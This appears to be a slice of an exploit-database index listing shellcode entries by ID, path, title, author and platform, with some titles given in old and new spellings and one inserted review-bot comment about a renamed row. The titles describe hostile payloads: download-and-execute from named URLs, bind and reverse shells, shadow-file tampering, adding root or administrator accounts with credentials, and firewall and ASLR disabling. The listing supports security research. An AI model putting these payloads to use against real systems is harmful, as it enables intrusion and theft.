350 13699 shellcodes/windows_x86/13699.txt Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode 2010-05-10 Crack_MaN shellcode windows_x86
351 13702 shellcodes/linux_x86/13702.c Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes) 2010-05-17 Jonathan Salwan shellcode linux_x86
352 13703 shellcodes/linux_x86/13703.txt shellcodes/linux_x86/13703.c Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
353 13704 shellcodes/solaris_x86/13704.c Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
354 13707 shellcodes/solaris_x86/13707.c Solaris/x86 - Halt Shellcode (36 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
355 13709 shellcodes/solaris_x86/13709.c Solaris/x86 - Reboot() Shellcode (37 bytes) 2010-05-21 Jonathan Salwan shellcode solaris_x86
357 13712 shellcodes/linux_x86/13712.c Linux/x86 - Disable ASLR Security Shellcode (106 bytes) 2010-05-25 Jonathan Salwan shellcode linux_x86
358 13715 shellcodes/linux_x86/13715.c Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes) 2010-05-27 agix shellcode linux_x86
359 13716 shellcodes/linux_x86/13716.c Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes) 2010-05-27 agix shellcode linux_x86
360 13719 shellcodes/windows_x86-64/13719.txt shellcodes/windows_x86-64/13719.c Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) 2010-05-28 agix shellcode windows_x86-64
361 13722 shellcodes/linux_x86/13722.c Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes) 2010-05-31 antrhacks shellcode linux_x86
362 13723 shellcodes/linux_x86/13723.c Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
363 13724 shellcodes/linux_x86/13724.c Linux/x86 - Kill All Running Process Shellcode (11 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
364 13725 shellcodes/linux_x86/13725.txt shellcodes/linux_x86/13725.c Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
365 13726 shellcodes/linux_x86/13726.txt shellcodes/linux_x86/13726.c Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
366 13728 shellcodes/linux_x86/13728.c Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes) 2010-06-01 gunslinger_ shellcode linux_x86
367 13729 shellcodes/windows_x86-64/13729.txt shellcodes/windows_x86-64/13729.c Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes) Windows/x64 (7) - cmd.exe Shellcode (61 bytes) 2010-06-01 agix shellcode windows_x86-64
368 13730 shellcodes/linux_x86/13730.c Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes) 2010-06-02 gunslinger_ shellcode linux_x86
369 13731 shellcodes/linux_x86/13731.c Linux/x86 - Hard Reboot Shellcode (29 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
370 13732 shellcodes/linux_x86/13732.c Linux/x86 - Hard Reboot Shellcode (33 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
372 13742 shellcodes/linux_x86/13742.c Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
373 13743 shellcodes/linux_x86/13743.c Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
374 14334 shellcodes/linux_x86/14334.c Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes) 2010-07-11 blake shellcode linux_x86
375 13828 shellcodes/windows/13828.c Windows - MessageBoxA Shellcode (238 bytes) Windows - MessageBoxA() Shellcode (238 bytes) 2010-06-11 RubberDuck shellcode windows
376 13875 shellcodes/solaris_x86/13875.c Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes) 2010-06-14 Jonathan Salwan shellcode solaris_x86
377 13908 shellcodes/linux_x86-64/13908.c Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) Linux/x64 - Disable ASLR Security Shellcode (143 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
378 13910 shellcodes/linux_x86/13910.c Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
379 13915 shellcodes/linux_x86-64/13915.txt shellcodes/linux_x86-64/13915.c Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
380 13943 shellcodes/linux_x86-64/13943.c Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) 2010-06-20 Jonathan Salwan shellcode linux_x86-64
381 14014 shellcodes/generator/14014.pl Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator) Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator) 2010-06-24 d0lc3 shellcode generator
382 14116 shellcodes/arm/14116.txt shellcodes/arm/14116.c Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes) 2010-06-29 Jonathan Salwan shellcode arm
383 14052 shellcodes/windows/14052.c Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes) Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes) 2010-06-25 RubberDuck shellcode windows
384 14097 shellcodes/arm/14097.c Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes) 2010-06-28 Jonathan Salwan shellcode arm
385 14119 shellcodes/linux_x86/14119.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes) 2010-06-29 gunslinger_ shellcode linux_x86
386 14142 shellcodes/arm/14142.c Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes) 2010-06-30 Florian Gaultier shellcode arm
387 14122 shellcodes/arm/14122.txt shellcodes/arm/14122.c Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) 2010-06-29 Florian Gaultier shellcode arm
388 14139 shellcodes/arm/14139.c Linux/ARM - Disable ASLR Security Shellcode (102 bytes) 2010-06-30 Jonathan Salwan shellcode arm
389 14190 shellcodes/arm/14190.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes) 2010-07-03 Jonathan Salwan shellcode arm
390 14216 shellcodes/linux_x86/14216.c Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes) 2010-07-05 Magnefikko shellcode linux_x86
396 14261 shellcodes/generator/14261.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator) 2010-07-07 Jonathan Salwan shellcode generator
397 14276 shellcodes/linux_x86/14276.c Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes) 2010-07-08 gunslinger_ shellcode linux_x86
398 14288 shellcodes/windows_x86/14288.asm Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni shellcode windows_x86
399 14305 shellcodes/linux_x86-64/14305.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) 2010-07-09 10n1z3d shellcode linux_x86-64
400 14332 shellcodes/linux_x86/14332.c Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes) 2010-07-11 blake shellcode linux_x86
401 14691 shellcodes/linux_x86/14691.c Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes) 2010-08-19 Aodrulez shellcode linux_x86
402 14697 shellcodes/windows/14697.c Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes) Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes) 2010-08-20 Glafkos Charalambous shellcode windows
403 14795 shellcodes/bsd_x86/14795.c BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes) 2010-08-25 beosroot shellcode bsd_x86
404 14873 shellcodes/windows_x86/14873.asm Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes) 2010-09-01 dijital1 shellcode windows_x86
405 14907 shellcodes/arm/14907.c Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes) 2010-09-05 Jonathan Salwan shellcode arm
413 15316 shellcodes/arm/15316.asm Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15317 shellcodes/arm/15317.asm Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
415 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
416 15618 shellcodes/osx/15618.c OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
417 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit) 2010-12-09 Jonathan Salwan shellcode generator
418 15879 shellcodes/windows_x86/15879.txt Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode 2010-12-31 Skylined shellcode windows_x86
419 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
420 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
421 16283 shellcodes/windows_x86/16283.txt shellcodes/windows_x86/16283.asm Windows/x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode windows_x86
422 17432 shellcodes/superh_sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode superh_sh4
423 17194 shellcodes/linux_x86/17194.txt shellcodes/linux_x86/17194.c Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode linux_x86
424 17224 shellcodes/osx/17224.s OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2011-04-29 hammackj shellcode osx
425 17323 shellcodes/windows/17323.c Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) 2011-05-25 RubberDuck shellcode windows
426 20195 shellcodes/linux_x86/20195.c Linux/x86 - Disable ASLR Security Shellcode (83 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
427 17326 shellcodes/generator/17326.rb Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit) 2011-05-26 Alexey Sintsov shellcode generator
428 17371 shellcodes/linux_x86/17371.c Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan shellcode linux_x86
429 17439 shellcodes/superh_sh4/17439.c Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes) 2011-06-23 Jonathan Salwan shellcode superh_sh4
430 17545 shellcodes/windows_x86/17545.txt shellcodes/windows_x86/17545.c Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) 2011-07-18 KaHPeSeSe shellcode windows_x86
431 17559 shellcodes/linux_x86/17559.c Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes) 2011-07-21 Ali Raheem shellcode linux_x86
432 17564 shellcodes/osx/17564.asm OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode 2011-07-24 pa_kt shellcode osx
433 17940 shellcodes/linux_mips/17940.c Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes) 2011-10-07 entropy shellcode linux_mips
434 17996 shellcodes/generator/17996.c Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator) 2011-10-18 entropy shellcode generator
435 18154 shellcodes/superh_sh4/18154.c Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes) 2011-11-24 Jonathan Salwan shellcode superh_sh4
436 18162 shellcodes/linux_mips/18162.c Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes) 2011-11-27 rigan shellcode linux_mips
437 18163 shellcodes/linux_mips/18163.c Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes) 2011-11-27 rigan shellcode linux_mips
438 18197 shellcodes/linux_x86-64/18197.c Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) Linux/x64 - execve(/bin/sh) Shellcode (52 bytes) 2011-12-03 X-h4ck shellcode linux_x86-64
439 18226 shellcodes/linux_mips/18226.c Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes) 2011-12-10 rigan shellcode linux_mips
440 18227 shellcodes/linux_mips/18227.c Linux/MIPS - reboot() Shellcode (32 bytes) 2011-12-10 rigan shellcode linux_mips
441 18294 shellcodes/linux_x86/18294.c Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode 2011-12-31 pentesters.ir shellcode linux_x86
442 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan shellcode linux_x86
443 18585 shellcodes/linux_x86-64/18585.s Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) 2012-03-12 0_o shellcode linux_x86-64
444 18885 shellcodes/linux_x86/18885.c Linux/x86 - execve(/bin/dash) Shellcode (42 bytes) 2012-05-16 X-h4ck shellcode linux_x86
445 20196 shellcodes/linux_x86/20196.c Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
446 21252 shellcodes/arm/21252.asm Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2012-09-11 midnitesnake shellcode arm
448 21254 shellcodes/arm/21254.asm Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes) 2012-09-11 midnitesnake shellcode arm
449 40363 shellcodes/windows_x86/40363.c Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) 2016-09-13 Roziul Hasan Khan Shifat shellcode windows_x86
450 22489 shellcodes/windows/22489.cpp Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) 2012-11-05 b33f shellcode windows
451 40890 shellcodes/windows_x86-64/40890.c Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) 2016-12-08 Roziul Hasan Khan Shifat shellcode windows_x86-64
452 23622 shellcodes/linux_x86/23622.c Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) 2012-12-24 Hamza Megahed shellcode linux_x86
453 24318 shellcodes/windows/24318.c Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode 2013-01-24 RubberDuck shellcode windows
454 25497 shellcodes/linux_x86/25497.c Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes) 2013-05-17 Russell Willis shellcode linux_x86
455 40387 shellcodes/hardware/40387.nasm Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes) 2016-09-16 Sean Dillon shellcode hardware
456 27132 shellcodes/linux_mips/27132.txt Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) 2013-07-27 Jacob Holcomb shellcode linux_mips
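Review bot: row 24318 drops "x86-64 / x86" from the title, leaving "Windows (2000/XP/7)", and since the path and platform column are the generic shellcodes/windows/ and windows, the row no longer records which architectures the entry covers. Other rows in this commit keep the architecture and only respell it (x86-64 to x64); suggest doing the same here, e.g. "Windows/x64 / x86 (2000/XP/7)", unless the removal is deliberate, in which case say why in the commit message.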
461 28996 shellcodes/windows/28996.c Windows - MessageBox + Null-Free Shellcode (113 bytes) 2013-10-16 Giuseppe D'Amore shellcode windows
462 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
463 40352 shellcodes/windows_x86/40352.c Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode windows_x86
464 33836 shellcodes/windows/33836.txt shellcodes/windows/33836.c Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
465 34060 shellcodes/linux_x86/34060.c Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode linux_x86
466 34262 shellcodes/linux_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode linux_x86
467 34592 shellcodes/linux_x86/34592.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) 2014-09-09 Ali Razmjoo shellcode linux_x86
468 34667 shellcodes/linux_x86-64/34667.c Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) 2014-09-15 MadMouse shellcode linux_x86-64
469 34778 shellcodes/linux_x86/34778.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) 2014-09-25 Javier Tejedor shellcode linux_x86
470 35205 shellcodes/linux_x86-64/35205.txt shellcodes/linux_x86-64/35205.asm Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) 2014-11-10 Breaking.Technology shellcode linux_x86-64
471 35519 shellcodes/linux_x86/35519.txt shellcodes/linux_x86/35519.c Linux/x86 - rmdir() Shellcode (37 bytes) 2014-12-11 kw4 shellcode linux_x86
472 35586 shellcodes/linux_x86-64/35586.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
473 35587 shellcodes/linux_x86-64/35587.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
474 35793 shellcodes/windows_x86/35793.txt Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86
475 35794 shellcodes/windows_x86-64/35794.txt Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86-64
476 35868 shellcodes/linux_mips/35868.c Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes) 2015-01-22 Sanguine shellcode linux_mips
477 36411 shellcodes/generator/36411.txt shellcodes/generator/36411.py Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) 2015-03-16 Ali Razmjoo shellcode generator
478 36274 shellcodes/linux_mips/36274.c Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
479 36276 shellcodes/linux_mips/36276.c Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
480 36359 shellcodes/linux_x86-64/36359.c Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) 2014-03-27 Chris Higgins shellcode linux_x86-64
481 36391 shellcodes/linux_x86/36391.c Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
482 36393 shellcodes/linux_x86/36393.c Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
483 36394 shellcodes/linux_x86/36394.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
494 36780 shellcodes/windows_x86/36780.c Windows/x86 (XP SP3) - Restart Shellcode (57 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
495 36781 shellcodes/generator/36781.py Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) 2015-04-17 Konstantinos Alexiou shellcode generator
496 36857 shellcodes/linux_x86/36857.c Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes) 2015-04-29 noviceflux shellcode linux_x86
497 36858 shellcodes/linux_x86-64/36858.c Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes) 2015-04-29 noviceflux shellcode linux_x86-64
498 36921 shellcodes/linux_x86/36921.c Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes) 2015-05-06 Oleg Boytsev shellcode linux_x86
499 36908 shellcodes/linux_x86/36908.c Linux/x86 - exit(0) Shellcode (6 bytes) 2015-05-04 Febriyanto Nugroho shellcode linux_x86
500 37069 shellcodes/linux_x86/37069.c Linux/x86 - execve(/bin/sh) Shellcode (26 bytes) 2015-05-20 Reza Behzadpour shellcode linux_x86
504 37297 shellcodes/linux_x86/37297.txt Linux/x86 - Read /etc/passwd Shellcode (58 bytes) 2015-06-16 B3mB4m shellcode linux_x86
505 37358 shellcodes/linux_x86/37358.c Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) 2015-06-24 B3mB4m shellcode linux_x86
506 37359 shellcodes/linux_x86/37359.c Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes) 2015-06-24 B3mB4m shellcode linux_x86
507 37362 shellcodes/linux_x86-64/37362.c Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) 2015-06-24 Bill Borskey shellcode linux_x86-64
508 37365 shellcodes/linux_x86/37365.c Linux/x86 - Download File + Execute Shellcode 2015-06-24 B3mB4m shellcode linux_x86
509 37366 shellcodes/linux_x86/37366.c Linux/x86 - Reboot() Shellcode (28 bytes) 2015-06-24 B3mB4m shellcode linux_x86
510 37384 shellcodes/linux_x86/37384.c Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) 2015-06-26 Bill Borskey shellcode linux_x86
512 37391 shellcodes/linux_x86/37391.asm Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
513 37392 shellcodes/linux_x86/37392.asm Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
514 37393 shellcodes/linux_x86/37393.asm Linux/x86 - exec /bin/dash Shellcode (45 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
515 37401 shellcodes/linux_x86-64/37401.asm Linux/x86-64 - execve() Encoded Shellcode (57 bytes) Linux/x64 - execve() Encoded Shellcode (57 bytes) 2015-06-27 Bill Borskey shellcode linux_x86-64
516 37495 shellcodes/linux_x86/37495.py Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator) 2015-07-05 Artem T shellcode linux_x86
517 37664 shellcodes/windows_x86/37664.c Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes) 2015-07-21 B3mB4m shellcode windows_x86
518 37749 shellcodes/linux_x86/37749.c Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes) 2015-08-10 Guillaume Kaddouch shellcode linux_x86
519 37758 shellcodes/windows_x86/37758.c Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes) Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes) 2015-08-12 noviceflux shellcode windows_x86
520 37762 shellcodes/linux_x86/37762.py Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator) 2015-08-12 Anastasios Monachos shellcode linux_x86
521 37895 shellcodes/windows_x86-64/37895.asm Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes) Windows/x64 (2003) - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba shellcode windows_x86-64
522 38065 shellcodes/osx/38065.txt OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) 2015-09-02 Fitzl Csaba shellcode osx
523 38075 shellcodes/system_z/38075.txt Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes) 2015-09-02 Bigendian Smalls shellcode system_z
524 38088 shellcodes/linux_x86/38088.c Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) 2015-09-06 Ajith Kp shellcode linux_x86
525 38094 shellcodes/generator/38094.c Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) 2015-09-07 Ajith Kp shellcode generator
526 38116 shellcodes/linux_x86/38116.c Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes) 2015-09-09 Ajith Kp shellcode linux_x86
527 38126 shellcodes/osx/38126.c OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) 2015-09-10 Fitzl Csaba shellcode osx
528 38150 shellcodes/linux_x86-64/38150.txt Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x64 - execve(/bin/sh) Shellcode (34 bytes) 2015-09-11 Fanda Uchytil shellcode linux_x86-64
529 38194 shellcodes/android/38194.c Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes) 2015-09-15 Steven Padilla shellcode android
